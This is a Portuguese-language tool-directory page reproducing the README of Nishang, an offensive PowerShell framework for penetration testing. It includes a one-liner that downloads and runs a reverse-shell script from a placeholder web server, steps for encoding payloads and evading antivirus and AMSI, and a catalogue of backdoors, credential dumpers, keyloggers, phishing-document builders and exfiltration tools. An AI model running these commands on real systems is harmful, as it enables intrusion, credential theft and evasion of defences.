Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
nishang — Nishang - PowerShell ofensivo para red team, testes de penetração e segurança ofensiva. | Kitploit
Ferramentas/GitHubGitHub/samratashok/nishang
Quebra de SenhasFerramentas de PhishingEscalada de PrivilégiosGeração de PayloadsExploraçãoMovimento LateralExfiltração de DadosColeta de InformaçõesPós-ExploraçãoTestes de PenetraçãoComando e ControleRed Teaming
10.0k2.5khá 3 anosRevisado pelo Kitploit

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar
GitHubsamratashok/nishang

nishang

Nishang - PowerShell ofensivo para red team, testes de penetração e segurança ofensiva.

Ver Repositório

Nishang

Nishang é um framework e coleção de scripts e payloads que permite o uso do PowerShell para segurança ofensiva, testes de penetração e red teaming. Nishang é útil durante todas as fases do teste de penetração.

Por Nikhil Mittal Fundador da Altered Security - Treinamento prático em red team e segurança empresarial!

Uso

Importe todos os scripts na sessão atual do PowerShell (PowerShell v3 em diante).

root@kitploit:~
PS C:\nishang> Import-Module .\nishang.psm1

Use os scripts individualmente com dot sourcing.

root@kitploit:~
PS C:\nishang> . C:\nishang\Gather\Get-Information.ps1

PS C:\nishang> Get-Information

Para obter ajuda sobre qualquer script ou função, use:

root@kitploit:~
PS C:\nishang> Get-Help [scriptname] -full

Observe que a ajuda está disponível para a função carregada após executar o script, e não para o script em si, desde a versão 0.3.8. Em todos os casos, o nome da função é o mesmo que o nome do script.

Por exemplo, para ver a ajuda sobre Get-WLAN-Keys.ps1, use

root@kitploit:~
PS C:\nishang> . C:\nishang\Get-WLAN-Keys.ps1

PS C:\nishang> Get-Help Get-WLAN-Keys -Full

Antivírus

Os scripts do Nishang são sinalizados por muitos antivírus como maliciosos. Os scripts em um alvo devem ser usados na memória, o que é muito fácil de fazer com o PowerShell. Dois métodos básicos para executar scripts PowerShell na memória:

Método 1. Use o download e execução na memória: Use o comando abaixo para executar um script PowerShell a partir de um shell remoto, shell nativo do meterpreter, um web shell etc., e a função exportada por ele. Todos os scripts do Nishang exportam uma função com o mesmo nome na sessão atual do PowerShell.

root@kitploit:~
powershell iex (New-Object Net.WebClient).DownloadString('http://<yourwebserver>/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress [IP] -Port [PortNo.]

Método 2. Use o parâmetro -encodedcommand (ou -e) do PowerShell Todos os scripts do Nishang exportam uma função com o mesmo nome na sessão atual do PowerShell. Portanto, certifique-se de que a chamada da função seja feita no próprio script ao usar o parâmetro encodedcommand de um shell não PowerShell. Para o exemplo acima, adicione uma chamada de função (sem aspas) "Invoke-PowerShellTcp -Reverse -IPAddress [IP] -Port [PortNo.]".

Codifique o script usando Invoke-Encode do Nishang:

root@kitploit:~
PS C:\nishang> . \nishang\Utility\Invoke-Encode

PS C:\nishang> Invoke-Encode -DataToEncode C:\nishang\Shells\Invoke-PowerShellTcp.ps1 -OutCommand

Dados codificados gravados em .\encoded.txt

Comando codificado gravado em .\encodedcommand.txt

A partir disso, use o script codificado de encodedcommand.txt e execute-o em um alvo onde comandos possam ser executados (um shell remoto, shell nativo do meterpreter, um web shell, etc.). Use da seguinte forma:

root@kitploit:~
C:\Users\target> powershell -e [encodedscript]

Se os scripts ainda forem detectados, alterar os nomes das funções e parâmetros e remover o conteúdo de ajuda ajudará.

Caso o AMSI do Windows 10 ainda esteja bloqueando a execução do script, veja este blog: http://www.labofapenetrationtester.com/2016/09/amsi.html

Scripts

O Nishang atualmente contém os seguintes scripts e payloads.

ActiveDirectory

Set-DCShadowPermissions

Modifique objetos do AD para fornecer permissões mínimas necessárias para DCShadow.

Antak - o Webshell

Antak

Execute scripts PowerShell na memória, execute comandos e faça download e upload de arquivos usando este webshell.

Backdoors

HTTP-Backdoor

Um backdoor que pode receber instruções de sites de terceiros e executar scripts PowerShell na memória.

DNS_TXT_Pwnage

Um backdoor que pode receber comandos e scripts PowerShell de consultas DNS TXT, executá-los em um alvo e ser controlado remotamente usando as consultas.

Execute-OnTime

Um backdoor que pode executar scripts PowerShell em um horário determinado em um alvo.

Gupt-Backdoor

Um backdoor que pode receber comandos e scripts de um SSID de WLAN sem se conectar a ele.

Add-ScrnSaveBackdoor

Um backdoor que pode usar o protetor de tela do Windows para execução remota de comandos e scripts.

Invoke-ADSBackdoor

Um backdoor que pode usar fluxos de dados alternativos e o Registro do Windows para obter persistência.

Add-RegBackdoor

Um backdoor que usa o conhecido truque do Debugger para executar payload com Sticky keys e Utilman (Windows key + U).

Set-RemoteWMI

Modifique permissões de namespaces DCOM e WMI para permitir acesso a um usuário não administrador.

Set-RemotePSRemoting

Modifique permissões do PowerShell remoting para permitir acesso a um usuário não administrador.

Bypass

Invoke-AmsiBypass

Implementação de métodos publicamente conhecidos para contornar/evitar AMSI.

Client

Out-CHM

Crie arquivos CHM infectados que podem executar comandos e scripts PowerShell.

Out-Word

Crie arquivos Word e infecte os existentes para executar comandos e scripts PowerShell.

Out-Excel

Crie arquivos Excel e infecte os existentes para executar comandos e scripts PowerShell.

Out-HTA

Crie um arquivo HTA que pode ser implantado em um servidor web e usado em campanhas de phishing.

Out-Java

Crie arquivos JAR assinados que podem ser usados com applets para execução de scripts e comandos.

Out-Shortcut

Crie arquivos de atalho capazes de executar comandos e scripts PowerShell.

Out-WebQuery

Crie arquivos IQY para phishing de credenciais e hashes SMB.

Out-JS

Crie arquivos JS capazes de executar comandos e scripts PowerShell.

Out-SCT

Crie arquivos SCT capazes de executar comandos e scripts PowerShell.

Out-SCF

Crie um arquivo SCF que pode ser usado para capturar desafios de hash NTLM.

Escalation

Enable-DuplicateToken

Quando privilégios de SYSTEM são necessários.

Remove-Update

Introduza vulnerabilidades removendo patches.

Invoke-PsUACme

Bypass UAC.

Execution

Download-Execute-PS

Baixe e execute um script PowerShell na memória.

Download_Execute

Baixe um executável em formato texto, converta-o em executável e execute.

Execute-Command-MSSQL

Execute comandos PowerShell, comandos nativos ou comandos SQL em um servidor MSSQL com privilégios suficientes.

Execute-DNSTXT-Code

Execute shellcode na memória usando consultas DNS TXT.

Out-RundllCommand

Execute comandos e scripts PowerShell ou uma sessão reversa do PowerShell usando rundll32.exe.

Gather

Check-VM

Verifique se é uma máquina virtual.

Copy-VSS

Copie o arquivo SAM usando o Volume Shadow Copy Service.

Invoke-CredentialsPhish

Engane um usuário para fornecer credenciais em texto simples.

FireBuster FireListener

Um par de scripts para teste de egress

Get-Information

Obtenha informações valiosas de um alvo.

Get-LSASecret

Obtenha o segredo LSA de um alvo.

Get-PassHashes

Obtenha hashes de senha de um alvo.

Get-WLAN-Keys

Obtenha chaves WLAN em texto simples de um alvo.

Keylogger

Registre as teclas digitadas de um alvo.

Invoke-MimikatzWdigestDowngrade

Despeje senhas de usuário em texto simples no Windows 8.1 e Server 2012

Get-PassHints

Obtenha dicas de senha de usuários do Windows de um alvo.

Show-TargetScreen

Conecte-se de volta e transmita a tela do alvo usando MJPEG.

Invoke-Mimikatz

Carregue o mimikatz na memória. Atualizado e com alguma customização.

Invoke-Mimikittenz

Extraia informações valiosas da memória de processos alvo (como navegadores) usando regex.

Invoke-SSIDExfil

Exfiltre informações como credenciais de usuário usando SSID de WLAN.

Invoke-SessionGopher

Identifique jump-boxes de administrador e/ou computadores usados para acessar máquinas Unix.

MITM

Invoke-Interceptor

Um proxy HTTPS local para ataques MITM.

Pivot

Create-MultipleSessions

Verifique credenciais em vários computadores e crie PSSessions.

Run-EXEonRemote Copie e execute um executável em várias máquinas.

Invoke-NetworkRelay Crie relays de rede entre computadores.

Prasadhak

Prasadhak

Verifique hashes de processos em execução contra o banco de dados do VirusTotal.

Scan

Brute-Force

Força bruta em FTP, Active Directory, MSSQL e Sharepoint.

Port-Scan

Um scanner de portas prático.

Powerpreter

Powerpreter

Toda a funcionalidade do nishang em um único módulo de script.

Shells

Invoke-PsGcat

Envie comandos e scripts para uma conta Gmail especificada para serem executados pelo Invoke-PsGcatAgent

Invoke-PsGcatAgent

Execute comandos e scripts enviados pelo Invoke-PsGcat.

Invoke-PowerShellTcp

Um shell reverso interativo do PowerShell ou bind shell

Invoke-PowerShellTcpOneLine

Versão reduzida do Invoke-PowerShellTcp. Também contém uma versão esqueleto que cabe em dois tweets.

Invoke-PowerShellTcpOneLineBind

Versão bind do Invoke-PowerShellTcpOneLine.

Invoke-PowerShellUdp

Um shell reverso interativo do PowerShell ou bind shell sobre UDP

Invoke-PowerShellUdpOneLine

Versão reduzida do Invoke-PowerShellUdp.

Invoke-PoshRatHttps

PowerShell reverso interativo sobre HTTPS.

Invoke-PoshRatHttp

PowerShell reverso interativo sobre HTTP.

Remove-PoshRat

Limpe o sistema após usar Invoke-PoshRatHttps

Invoke-PowerShellWmi

PowerShell interativo usando WMI.

Invoke-PowerShellIcmp

Um shell reverso interativo do PowerShell sobre ICMP.

Invoke-JSRatRundll

Um shell reverso interativo do PowerShell sobre HTTP usando rundll32.exe.

Invoke-JSRatRegsvr

Um shell reverso interativo do PowerShell sobre HTTP usando regsvr32.exe.

Utility

Add-Exfiltration

Adicione capacidade de exfiltração de dados para Gmail, Pastebin, um servidor web e DNS a qualquer script.

Add-Persistence

Adicione capacidade de persistência após reinicialização a um script.

Remove-Persistence

Remova a persistência adicionada pelo script Add-Persistence.

Do-Exfiltration

Use pipe (|) com qualquer script para exfiltrar a saída.

Download

Transfira um arquivo para o alvo.

Parse_Keys

Analise as teclas registradas pelo keylogger.

Invoke-Encode

Codifique e comprima um script ou string.

Invoke-Decode

Decodifique e descomprima um script ou string do Invoke-Encode.

Start-CaptureServer

Execute um servidor web que registra autenticação Basic e hashes SMB.

ConvertTo-ROT13

Codifique uma string para ROT13 ou decodifique uma string ROT13.

Out-DnsTxt

Gere registros DNS TXT que podem ser usados com outros scripts.

[Base64ToString]

[StringToBase64]

[ExetoText]

[TexttoExe]

Atualizações

Atualizações sobre o Nishang podem ser encontradas no meu blog http://labofapenetrationtester.com e no meu Twitter @nikhil_mitt.

Bugs, Feedback e Solicitações de Funcionalidades

Por favor, abra uma issue se encontrar um bug ou tiver uma solicitação de funcionalidade. Você pode me enviar um e-mail para nikhil [dot] uitrgpv at gmail.com

Lista de Discussão

Para feedback, discussões e solicitações de funcionalidades, junte-se a: http://groups.google.com/group/nishang-users

Contribuindo

Estou sempre procurando contribuidores para o Nishang. Por favor, envie solicitações ou me envie um e-mail.

Postagens no Blog

Algumas postagens úteis no blog para iniciantes:

http://www.labofapenetrationtester.com/2014/06/nishang-0-3-4.html

http://labofapenetrationtester.com/2012/08/introducing-nishang-powereshell-for.html

http://labofapenetrationtester.com/2013/08/powerpreter-and-nishang-Part-1.html

http://www.labofapenetrationtester.com/2013/09/powerpreter-and-nishang-Part-2.html

Todas as postagens sobre Nishang:

http://www.labofapenetrationtester.com/search/label/Nishang

Baixar ferramenta